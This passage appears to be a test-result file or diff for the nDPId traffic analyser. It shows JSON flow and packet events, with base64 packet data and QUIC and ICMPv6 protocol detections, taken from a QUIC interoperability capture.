4D0wUdqR6tPZpisKmvW9Y3UI2tmUo9tLMaYgnRgRJ8M4\/14reEvtbK2a7xa1D+9b4yQoAoVStwjeuCruASzB76vQ7Oikq\/y28NWNAE6l7JAxtLpbUGRtWL7EwfR3329LDfnglJf6znmUiNxo5AmhhQH2+XGsnwv7e2QwJKwUtxfbSP6qjjAq\/IHu8Ph2sxgzDmxzqJS6NBD5\/rREJkwIRDPsPQN1aQTeYN2N94Pv5crstjdG+7f9DC85NWJZAJRxBLehoQTlbi\/SnUmr9i8puHfTCKc8NDOGV
lMiWSfVcSKswlSyz9AjvXr\/Y+TehMUjsxQeL0lUqcIXfqPcJlum33ICV492562h19036aZai6yQ0yHgw3hE7aGMjyObE+Uh9o51GqJfXzYJ\/J3E7ReivOwkmjMio6pMVZIlFMAmLX7M2ggGLe5cHg=="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1603816434680,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1603816434680,"pkt":"PKn0qB\/spJGxgjQ5ht1gAQBvAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVLAdgAfFkT+AAAAAAAIs6FDVD5jbx4KGio6\/wAAHQ=="} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1603816434680,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434680,"pkt":"PKn0qB\/spJGxgjQ5ht1gCSIhBNg6MiABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9AQQtsQAAAABgAlC2BNgRMiABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWmsgBuwTYjDrICgoKCgjzgkejWnQFTwAARL7AEcGzrGiFbLDVVitPMjpX6T6us8klH0LZdsk33gK4kca790hWc9lEqiHw2zuG3cvmTx4edwCefhx9uVFQHbwCX7OdVaAKALQsTDf2esUnZnHqAVwqfHs0alGH87lg8LOQYMLCyJ5o4796Hi54oLNHvp1iBOlawAP1QQwkOrhTac81Z\/3lqw5txy4fqI2ulRUcc8HMVbAvriqgCRBafLPQysmCOVqjinACocPdi0ZP1pUx0qn0+kKcTF+7gFuANdSw5ZrXDF5v6YKUxiJ6vSw8Hy7vrpHpUiN+5fprlESKduOvuve2w8S0Rn1T\/QCLnqgsvW4zVX2obPqKMBoLM0FaRFm0tupv3jD2Bo6wMhEP7UVS6LQVCbX\/F5hZ42FQPL174ha0Yjp7fot\/ow92n0s8sDYpXdyVzzUtmI9H59mtClZBkXIm4hCy5YwKUBE5Htf0HL6v7tX\/C56I4bHgjD1kXDqKwEusnGxfxLkbm5cB84\/UPVfX54l5AlcUWrKt\/sWPHXza3lrXmjl3iKLayJGvSvxgwAyLdj+1dAf2mHjT3T9ZeLg4TPyNz17SLyKDROZpbuZtC2zCbnl+NoReuXxIIu553FeA7K1Fq06E+HYHhMw9+fWseAQfiQhoIBqlHGL+6zzFwJx8LqsX2kF9IlqJJkfGxh2dCK8J4o5uVhtnU3J2xj0GDXLtBrNSCk7DDd67hChkNkJ\/zra77RGExcKdo9KUDUUYykOLFAbdNAsP9djZJfE2+FIW26Q0ve6PvxjGma3cI1DAbfodw3x7gmpMenGXbAesto3GigfY8Dqk5DyVN2us4Q8jxijjrwa1uGb6WCWFIbPGsRxa2EtoUIAHsP\/pagnvZR1tK2myhxOFZczPeNlpxk1o3SOIXdZrMfCNqe8UgV89dZHklMi3hgQCyoO5n2p9n2UNtckDsulzdkWAkN7ELjfKSw3xLKX8QYYwRNZkrnslYV\/gNUyPn\/DAHxcrYsCggnVPpcMfjQHnjiySyU7agWUfxfnrK5KR0Hz1uxcerQD9r2dHrU5GwRgAJqiERgTrm61j0\/9g6EnJzaJxnY2YL\/8StPHOT4TbswEzgPxmOMhq3B3NyVJmRRvGKyoWosF33+eeRJZtqDmGzt7Y\/QslvmPGsoNyGhIfWD4qHCWm8JN2zWi8NKuiyFpgsC\/gseqp2COjYeHLzTsHE8Lb24ziOBbxiS8nhlUeyvkTXTnPgtpZev\/ducm+wW0A+YY2gp+9vovT+lMYKPoIIeW89qmvsTK34QrhAHBV8Gdi7IG6oE67NdkIrFleG4EtBQyuNTVG\/Hni6IlsFEhmcMOi9gtqRQF0bots7U2r2su6TX5cs\/tWsUtfcKDq01p1Oi+UeZRz\/V+lKX5GfCRE\/JIN8wqGMoYFzwTiwgXQFJuV
\/tc8U4uoRYgnau5MAB9+BYOU44CnqwsIla5AaVfMisOMnVZhANbfOkDwWOMuBcFcvM4iPJEdLrpJXtiL7lozz\/DNjHrb6qIdiWBMUyCod\/1w5XY81jvBVw6EPdS52X\/61VYwnM6etnlrj2efLA=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1603816434682,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434682,"pkt":"PKn0qB\/spJGxgjQ5ht1gCzKCACMROyYGRwAAEAAAAAAAAGgWCCYgAQsHCsnVrqTT\/kdpHoB9Abu1EQAj2NGpAAAAAAAI+gzxyVlrPLD\/AAAd\/wAAHP8AABs="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1603816434684,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434684,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAiNhAAEARQ6HAqAGAyu7cXIm\/EVIE7DIpzgoKCgoIV4qr8UTBK3QAAETSh\/17BQebdhKt5N8exOyNj+uiOYMPWvj6jDz\/XRUXpazLTuGIaL+gAsTmd0\/ny+0FgJZmR3W9tTl2uiHStd0rHjDhZZpjA+Vv70KyXaIxYALOy77NR4C4EhjQ7Woy4Z1XktOMuzY1G1wK+\/m8WHSuXiS0ZJH0FyTMGjp1ybnyu6MTC\/32FsQ4+KBXvfT1hZaE3FEFqOfGH728c4f7jwV39sXMvsF\/koxt7XF+OaEoT44gruD3j1M3Pn+2KBK+MAfr0VIJTB\/qx0CUwI+AOjfOrOEwPlBTKV\/RpKd6AM0mgPkKYfiJQlRit614p6k0X9lbx\/f6ahWLCq72n2YzUVWYWdT5J7gjttfn3tAoB7zUzS53IQUv1B2zhYj8uYWCPv5E8X1+\/TvDaDXt2s1yt3mYps645wMsjGX9jfYnekRT\/suzL4Jvq5T+oMyQFpalloUrRQHYgV03PgJRooTK2iTJSDezMo3Sabn4X3VQSLr6CnIqGTTH4TZdTS1EPTMj1g2xj\/dIUvvG\/pFUdjLNu0inX1PgBZ1cWwdYMDOvaetqYINrUUAYfMt0S6ZnZpx8OdfUPc+mujDPZthVujZlugXTs5\/Mi1arhb7RDdu56QF0HkACvwfN4y6hPV9GkFI7UUzwkjbNgS+SVTyZpwJf1vfOY3NxgRH+ySFpHqqy7QQrR1g1b3fzph2N6Zo2yzEoxr3cQcaq6oirf5SKGC3qVOfI2XVtorskDTjDPZugOVkY\/anHMfrVansEFGxUEN\/DC\/sCrdnQCX2T0SNbs6Z3vWghQ\/Ttglq6nwriBypoi1GkgpMWRpNQC1+tftj6Y6qDc8PUt47spNcYJ0VauEV18MYpeZpOQrwmNsvWkYDeiXS3LX6E8xtGwpF4W5EfDLclRZBbPNPUZexMZprIpblVxLNvXkp38hv3mKP9juEW+w1x9u0\/FE+PXNXqQt+cpccucng\/siXW8dIomIy+1Vr2PrUvdyaaKk0C6UQxd5P55nB9LiOhbpyhKVQTsv\/+44XghuC1pJ3FXt2NjQe+CUcHyg\/CStdVZ77sBr3jEHJD5WyRhPOE0PHrKjEkwO61egIk2dYxhBIp8OCkst22lv5y0ZwcT34lkkTv5u3Z+PpFSID1U+kLTu+5h8UIdmdChB8Ic1cG4AQYLHLWNXQ2dMqc9hc5mVaWGdqVsXAgEZ8PmUGN1\/+K9d7hwED1E+zAtc4tOBuE\/zS269MNpdYACOTcy9RHUvjlSspQylJjubyYwnj40H3orsiMgpv6tA2AxST8dUKpvzYljGrSAdakZ46qVrbuEBiCGMTCs+\/UNgvM2e6Fe+6gqDCfOY\/zXSUtlduoc3jid15XCt88k2M9Kq40sh6m+8eKjtvlwD7XYwfSnLxwxhEyeUkGT+13FX++6oG59AfysFjC5iJYSscA+YXyA0hYuJ9OTtOQZg32pXfl5BmrmRqnRAIwBXmzbGgXzEsXtx+lmlWCK421d8ePwyDwI8wnHfI\/9
0mFIe34gGT+WMlq4ZgFubtwTSjzidVFs7GoczF7Lrr2uW4jA9qjpqY0sj9p\/VVph1PRzTPVNMdHm+sMkD3+hhI82joYjOeoRxcWEO0C7MjWGcq92hfnKcQSy875okSAGULGntKS3GeTR0gVMj+6KA=="} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1603816434685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434685,"pkt":"pJGxgjQ5PKn0qB\/sht1gD105BNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmgL0RUQTYZ0HNCgoKCggKh53oSKcUIwAARL7gnbCt\/i9esljBwsmPvsojrH1nHZVBY0xSwfKH3XUIijCNgd7Dz8vI4xY\/GVgHV60CIRICp6Kjnr0zMRCxb3nrCucJOyP18UJ2XfpoAWpzvs2pUT\/u95vGBd8XvGhGtYoLqIrMkwYTUuZWsLPdt9\/gzvA15FlJOa7ugVzGXmi7RWK2tRS2hGORcD238yWdl10gYN8ZAvJb8s0UeahNz4nqOB1o1ewm+JfW47bFEqheid7sAMQL3N59\/ISUhkQ8vC1I4dVehQTYmG2zs3sj46oOz5lAFlK26vOv5VRV5IPztRMlciR7V6Adse5xtWtlpuIXzn5\/UDxzj9dah7+yAdZOHeT0zLvwsIoGcoPRxB0MH96VRzKARwz+S7KKOKG8cm2If62RiaOWfmxkaI06NFuh2TWyOGI\/smeYiBlrsSEsSPLBOsy9YKqIRy2SnU5fpV0QIrpOULNF15tvg64kCSUJEHN7hq8wuLHUYVeVMfUb150XuMPRFaeDc+hRLxIgkKsegq\/1GMLnU3cw+YqqtGx9Y3AG3jCsYvczhQt97g+bEAD3lWpSQqlnbIPVaRxSBb\/m++vYk0m7W88TjbXZd39\/H0cIlTvJ\/Z0SYJpuIBWlYvloAhW8wQNQxVyWnDT8EGTCZMIdSLrubgSgxklIcQghvYxGjlenv1U\/xWA4GVcvaRa3KIrmqe9Suq7Jbom9YtFec\/KcUQuypqb9vLHQd\/Slh\/IgOY2LIPbfGrFqtZ5IZSSAFLezKKTHeEUDMMIvjY6nNjfQvhye7w\/iK57ylN1XmmiCsHB2UUISWzLgrbBn+zFoD8q39CqH1PUlQIwDNgZ6s2PfqPEu+x2StileWyY9B4yefqdiNXFJ7u0v6qBj8LUR9\/ZHKs9wt4Es5WiMRZRGcohtyH5Q2qGSEuh57YGdY2plV0kqxOJJg8WuHGwG80hM4Tuuqa2qTyvzRzxBzkkv7jnWbsOt8w6eogTolB5Yq2lNlcox1ozX09J\/4y2Mgjm9fxydUta2PLhNKNF24FGjs9TlXrGvWStOf+FVD0GqXkj4kfvlc5hUlqiu\/hxYQyz7qNm\/6LH0VCx9ePdDf6W4APXGgkkBgu34ndfqUtg0Sa2fWK+OElqxxZw1+Hjyk43LjolIsRbpcWkcSLKwQP4O5jLw4EENRtGoAdziVGhmLWY7AyDGDqDXD+zk0FkOZMfIjeyouDPo8iAsGYm9Ha0mLEq8OysomYrCzakDZNst43uj50cSwd\/VS+ATJsBvZ7N7sRLvBamrC1umCD7i4s
16sQmoEu\/PSvNXlSeypCfAg2hJAeLhcz4\/B0WcrTcIC8sTScPAH3uwzv2dtb+6AkA7ey192Tem0ngjhVi9gaWtU5sFQIbMZEgPIufNBRz0zG92jR202hKnv2tVs8fpah1QPJuf+kSUD28xqWVBySjEINK1zyjumcct4vfD2Rv2hsFuDdEnRtRcJ\/VHoB5zsNZ72V1mw1n3OOM3pVkY4\/rmTj\/xZxixYjGJ4hQmi3ZfkZHdBqMDfT25BKOJoR4wohoVf2vU49x7VJnCxuwjZ+PxxTyZPpwTwZZg9+9l1NkFrr1xb3oTJlb1ej2KIFSLLbYLLG40yc\/N4lOiLv0z\/w=="} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1603816434685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434685,"pkt":"pJGxgjQ5PKn0qB\/sht1gCmkdBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB0gARUgTYZd\/PCgoKCgjoF2NeZfCaVwAARL7J5XVlyOrShWgSY1170HREhMEudzqX7b4Uhkojh\/MAMJlRFRdXrnf0lcWEClMJfDhoWlt0RFozrof+Pnw6B4\/ZyoD0RVgGp53poT7G9iC\/absqyVIsEHLsIVC5iZKsIfFtdWkKkdpnRNCGnT3VGY+lFXxBZPJt0vOu0Y2zKMRZ1lC610Klnd+ZJcx\/qSoPqRUIsoETASUmzbWQ7TdG1oxWQGH3wcVc\/v0ICxVUtoMYgJeXx8betPxfyREuBm4E4FoTyJhXcui3XIN3o0Due9ptbZ7SBfuGpb8TN46lwteVUqUUJ5Xe9lf39a3FP9dO2Xqnjw\/WZZomS7Iw1nD9mfjLCEsYGSPz8KBf1FK8U9BWWKadaREsfFGSsUnk3AD67edvUllQXvSDtlbzAUvFF3HIenC2Cy9ysj2h2ptZLfbFln02ZGCulECgFzFtpNDys561LCsH00nvAhS+\/pbJhKpkIQwt944Www\/ODMtfhA6WoAEpg
pG06f42PQF9unibmel+Q1UkCV\/Sju8NlC7DCa5v5QN61TvjaWLK+67RDNsHdrusmUnxS0Qw6MgCr1XJXgSd8aQkDA+Nthb+EBlxmaEXwuybb2XuVgqC4V6G6xFD3Gim1RJcrCQKLBGVfueSLYvhKVwT8SeP4SR+OZfWoWq9fjTaViFhYYCsic+3myY3YSADfawnGFA+SyhJdTjrJj9L1vETLMfU6LQ4fjJs\/8YN6WcxBXdSBCin3bSBe2urzqaduq+kb17UjxDbg4QJxXnAa7r5qUQIYXTqC81D8LDrVnVZEVBGUFKebfrcgAxOMID2c3r9c9lUOsj+C6sMlckNXJelOsGIB83E1w9dml1EmevOJyz+MzHSmFAJVMeyfthe7Acpa\/6iTFxUC2VqHJlZjwCn4\/6wRzHC9TG9Zo5VPWRd+g6TJGNweOX8P\/9ZlB9RFiPwzvHlNFT6b3Mb3QxWLg6Ttmg0E+ML1rtxKM7\/yRgs5vxr\/diUa1PzRXjEZ+f5zpp2kE91jKJH4+73tgEQMYk7Eyd89yRmygltVrH\/fU3Ue7GrFhffvVmLvE35MSx0aH6IGdc\/U1oMjWOy0EoTkWjTh0p859\/pRscc2n0uSgJ0X+9D\/EbzkVIZ39Oi5k4wHfsZGD8WTv3IQhB4KGqrNsOYfHpEFOYsQdn9gLcQXwn4iTTbKaZ9rDik21mQSKdUJWkKqJOll6AYoarRO+2QwNgtxGGc9KoDCliYHauCpZ+lGYjtpy5eB2tibMJTLE0Gnrzi6TXFgGqp4wUvIqEqIQ7kO3WFekwujCNCYafCZWYtZ66P1CWPtvc+cRSrUO6Bx299H6EewArx3M8oD1TU7RZVYNta1PmN9bWQg7109Ib8Pk3crjfxcU0dAj+led14LXpRrlgp\/QeJZZuc3wsMwiTDPy3TJcx5+ZXKykG0+Rze8up6KNJ0TOkliR5SFYCrvJk8ixSq\/yqeCqIEYozf9Q0bKCLl8\/Buyu+IUOQ+uNeuzWzi4apJbhNBlCaMuCrdvdjkQpiOWPf9EVqBWcYwBbWS1gM7Y0WFCSCyXc2PxB78fF4bL4IfjxhdAkZdz0MrFIiD9A7sCWzJyDkoQoFSPdTAM2SY\/PtnrUK9nA=="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1603816434686,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434686,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA9+cAAC0BNK0znmliwKgBgAMKTnsAAAAARQAFAF2XQAAwEYktwKgBgDOeaWKwwhFRBOz8KMwKCgoKCP1n32NN8EnlAABE0jB6HybCFUbabkBlXXQVvewn7zDYehbLSZDjKVLf8snzKJdjR\/3JsPdO+vxlafCYsOkUTueZwJWg10Sg8fn0URQdzFi5gf\/QXZQO6ykhfm8a5Zr2+yBt68dnry5zhANveVge4e8snv2G\/EjNXJKG6Jyq2Wd1UiHDsng78dU6PMilPEvqoDuVAeleo92UeM\/LYmvYaEQWibrlo50VzyM0Qv2OE8uBtE0321S2ppuHo\/ubVRja900u6Tdl87fZa+TqILwJoqVX3KxUJszQP\/m4sTr7SSAg4d30fbCCPgGuhd5vecogxfB3YV8fE8VleuNDGZEznGuTG3MEvmD8\/iDQCIxdLNqMLq4OHJR5K0P4db2PcHy\/HGrvnaBUxSsUFpFbt7dov\/pgLFhL9QjjASYLcFmP9aDGJ4WvT1nHm+247V70NABa4wQtolKRPLihtpaTI978PvhAx7OA\/FDrMALGCkkd0Ckzcuf5\/RdiusGznuJWz6dbRFAvYuAY6z+uTeSY3eMIQi5VhMcXXLlIqpnkVl9ay3z8cpya5MO76mkRAtNLAnc4uy4dq4IdWYKxFDEs514DLZLoll455nZesjVL6SKL9qMReSCKhO\/op5kVDv+GxSpbs9KycUr8HjhlDhtOqnPPf31XxGL0FX0honv9o2mTwKGu95c="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1603816434688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434688,"pkt":"PKn0qB\/spJGxgjQ5ht1gAY5iACMRNCABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVGLOwAj7QnAAAAAAAAINUX0m0oVmLXKOtq6\/wAAHf8AABs="} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1603816434693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434693,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApABAAEAR2hTAqAGAA3nyNu1wEVEE7JhqzAoKCgoI7mu7hqnhXwQAAETShPHzPPAkQK2NEhJGnleHaiN0ie5qTdnm464jrXCgs4dpEiXNx\/PGBx7TOLjXnxLSumidbRKwVj0cRR128B6iHNMflXwQht2t8Y44LmwMqcGdFgLa+9ZMaGseDnBaSdSq\/BTPBASRNPP5ViOFASdiCzWBBZ9WWzIm4Zq1cmr1m+3KYiXPZ4DYcjOiBC+RnrFuinz0kYMk86K9x6ewtyvVVkz06rH\/0pP52NDoXW\/b\/MQkNjC8KUi9qGQJPKOuv\/DmccHaQsbHCmJiyo\/0QNZTrabAtHI7akrTZimPvxnGDDh3iKeWTI0Rt9dVSQExok8KND6xq3GcpnEKSLoNMV4xJO\/u8Hd3ib0ZTAW90kp9rc7u7p5ChlZkz1hOn6CQxtLF+4Q0C+LoqzxjzQ7yi2OlbBMZIKyzLtWw7xW299MwVnAiFEtj5S1RjtdQdmj6SAPB0h4vvOCMTAjBLrzNUIzUQQ4418YwmRANW+EzePT6mR1Ale6pegThd1LeXLddvoztOKGJo5TEa5MgYMehxhTg2TXP6YXaavnooLGg557tbafcTn3wzp5jbVUwxY9sKGj16QzN8+Fynpug9j5\/9WGOFqWFzcYqmUsX0\/xG2xH8WvkKARD0l\/sk42N9NbTB7Ss95x\/zpvrC7DRs8wzKYSZy+NZzyMWwe4xcTPC8pdC3jzhcEXdF2RnCaPHIghUD9RT4W1CfQ1kNWOulxGvcIr6FHiUeq9MpQR4aV5XkRR5Ltsm0vYQyB2x6O6vPlGQo9UKOc2XAIsuJ\